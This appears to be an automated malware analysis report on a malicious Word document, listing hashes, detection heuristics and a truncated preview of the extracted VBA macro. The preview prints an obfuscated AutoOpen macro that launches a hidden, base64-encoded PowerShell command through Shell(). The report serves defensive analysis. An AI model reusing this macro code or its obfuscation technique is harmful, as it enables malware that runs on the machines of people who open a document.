Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0efcccc3b203ae31…

MALICIOUS

Office (OLE)

Size: 106.8 KB
Created: 2018-05-30 12:52:00
Authoring application: Microsoft Office Word
First seen: 2019-08-04
MD5: a3e5f141ce82fec9941989261b5d1c57
SHA-1: 8a3af29cd8704337622c12e78939d2e724d2c86c
SHA-256: 0efcccc3b203ae315fbc5c19cd8b4fe1c7cfd21706c195fa75038f8b1633290f
Risk Score: 242

Heuristics (7)

  • ClamAV: Doc.Malware.Valyria-7086204-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-7086204-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12970 bytes
SHA-256: 57084f2ff5cf1015c7b1a4771797a06c2ce36705958cfe2bada0767a835cf093
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "jRdwPLBiNu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function QjFOzMuFH()
On Error Resume Next
jBzli = Fix(78796 / CSng(35193) * DLWoO * Odfij)
VhBn = CDate(9304)
GVQBnI = Fix(47579 / CSng(54290) * PiJumB * hGqdV)
VhBn = CDate(6606)
QjFOzMuFH = WIGvnJZSW + IZrGPU + RVEouTFqpi + WbGNzM + AkVBGHCqw + dsJUBkjmNH + vGXjncJ + rLqcdZd + UTHzWuPHmc + QsFTE
uLzBH = Fix(24278 / CSng(33240) * GTTaji * rjtjVv)
VhBn = CDate(76819)
End Function
Sub Autoopen()
On Error Resume Next
UaNbzX = Fix(81139 / CSng(51725) * CGWqpG * PQfbp)
VhBn = CDate(51739)
hKDLhri (QjFOzMuFH)
USwPJ = Fix(69965 / CSng(72708) * SGjdbu * TLQssX)
VhBn = CDate(50146)
End Sub
Function hKDLhri(FCDzacX)
On Error Resume Next
tBZcU = Fix(9953 / CSng(30068) * qtOtI * IjqpVn)
VhBn = CDate(29394)
QVAzjzuJqI = nJNAfilZQ + Shell(hiljBwBPh + (Chr(vbKeyP)) + mfjjjfBWJw + FCDzacX + sWwPKFD, nYOjN + vbHide + rOOhDttIU)
LfWiw = Fix(38560 / CSng(22201) * iouGFN * HRcDuq)
VhBn = CDate(70106)
End Function


Attribute VB_Name = "AcUDjCCC"
Function WIGvnJZSW()
On Error Resume Next
RVkpM = Fix(45547 / CSng(20907) * kFcFvV * wPwzJM)
VhBn = CDate(47429)
cmklnOKU = "owersHeLL" + " -WinDo" + "wsTyle hidden" + " -e IAAoAC" + "gAKAAi" + "AHsANwA2AH0Aew" + "AxAH0AewA1ADAAf" + "QB7ADkAMQ" + "B9AHsAO"
cHVkm = Fix(90689 / CSng(68362) * EDWfzX * VPBfF)
VhBn = CDate(112)
SuwwUAli = "QB9AHsANwA5AH0" + "AewAyADUAfQB" + "7ADIA" + "OAB9AHsAMQA2AH0" + "AewAyADkAfQB" + "7ADYANQB9AHs"
BFCPGM = Fix(82295 / CSng(64932) * otSHi * nYBBiY)
VhBn = CDate(2995)
NtfXtHh = "AMwAwAH0A" + "ewA4ADIAfQ" + "B7ADYAOQB9AHsAN" + "AAxAH0AewA4" + "ADUAfQB7ADQ" + "AOQB9AHsAMwA" + "2AH0AewA3AH0Aew" + "A3ADAAfQB7ADI"
qvZCa = Fix(69524 / CSng(16177) * TCdFQi * oXjWo)
VhBn = CDate(65460)
sHckqkENNO = "ANwB9" + "AHsANwA" + "4AH0AewA4ADE" + "AfQB7ADYANgB9"
iPifcd = Fix(57294 / CSng(8813) * ZzjMU * JQzGHa)
VhBn = CDate(31529)
dtMdwVWLk = "AHsAMwA0AH0AewA" + "0AH0AewA1AH0Ae" + "wA4AD" + "MAfQB7ADI"
WIGvnJZSW = cmklnOKU + SuwwUAli + NtfXtHh + sHckqkENNO + dtMdwVWLk
End Function
Function IZrGPU()
On Error Resume Next
cZFCNd = Fix(90562 / CSng(4235) * qDRJY * IfDOhD)
VhBn = CDate(11379)
jamUMd = "AMwB9AHs" + "ANgAzA" + "H0Aew" + "A4ADgAfQB7ADQA" + "NgB9A" + "HsANwA0AH0Aew" + "AzAH0A" + "ewA3ADEAfQB7ADY" + "AOAB9AHs"
VCGNTY = Fix(65501 / CSng(50973) * OlBGX * QaaXmp)
VhBn = CDate(16957)
RESjJBi = "AMQA4AH0Aew" + "A1ADgAfQ" + "B7ADA" + "AfQB7ADYAMAB9" + "AHsANQA5AH0A" + "ewAzA"
YlVpb = Fix(8231 / CSng(22412) * aWpjzH * bdiQr)
VhBn = CDate(4999)
iuiHzUKzd = "DkAfQB7" + "ADIAN" + "gB9AHs" + "AMgA0AH" + "0AewA2ADQAfQB7A" + "DYANwB9AH" + "sANAAwAH0" + "AewA1A"
WokEn = Fix(76234 / CSng(13246) * SvMzhc * jGWAfK)
VhBn = CDate(59211)
clPDDG = "DYAfQB7ADQANAB9" + "AHsANAA1A" + "H0AewAyAD" + "EAfQB7ADcAMgB" + "9AHsAMw" + "AxAH0AewAx" + "ADUAf" + "QB7ADMAMwB9AHsA" + "NQA1AH0AewA"
IZrGPU = jamUMd + RESjJBi + iuiHzUKzd + clPDDG
End Function
Function RVEouTFqpi()
On Error Resume Next
nbIKw = Fix(89191 / CSng(15724) * RAzOj * WRYcv)
VhBn = CDate(7399)
CiTBSpzB = "2ADEAfQ" + "B7ADgAOQB9" + "AHsAOAA2" + "AH0AewA1ADQAfQB" + "7ADQANwB9AHsANA" + "AzAH0AewAyADIA" + "fQB7ADIAfQB" + "7ADUAMQB9AHs" + "AMwA4AH0A"
WAZndu = Fix(46203 / CSng(88541) * XOrXzd * cIlKVv)
VhBn = CDate(97841)
YGcjTGzYpMO = "ewA0ADIAfQB7ADU" + "ANwB9AH" + "sAMQA" + "zAH0AewA" + "zADcAfQB7ADYAfQ" + "B7ADEANAB9AHsAM" + "QAyAH0Aew" + "A4ADcAf"
NRijEc = Fix(5429 / CSng(29217) * XRajXU * kfadl)
VhBn = CDate(43486)
nriURZCFm = "QB7ADgAMAB" + "9AHsANwAzAH0A" + "ewA3ADcAfQB7AD" + "YAMgB9AHsAMw" + "AyAH0" + "AewA3" + "ADUAfQB7ADgAfQB" + "7ADEA"
HtnvU = Fix(18479 / CSng(86634) * bBrZM * opOUz)
VhBn = CDate(32689)
BkQsQqRuVNc = "NwB9AH" + "sAMQAwAH0" + "AewA4ADQAfQB" + "7ADUAMgB9AHsAMQ" + "AxAH0AewAzADUAf" + "QB7ADIAMAB" + "9AHsANAA"
RVEouTFqpi = CiTBSpzB + YGcjTGzYpMO + nriURZCFm + BkQsQqRuVNc
... (truncated)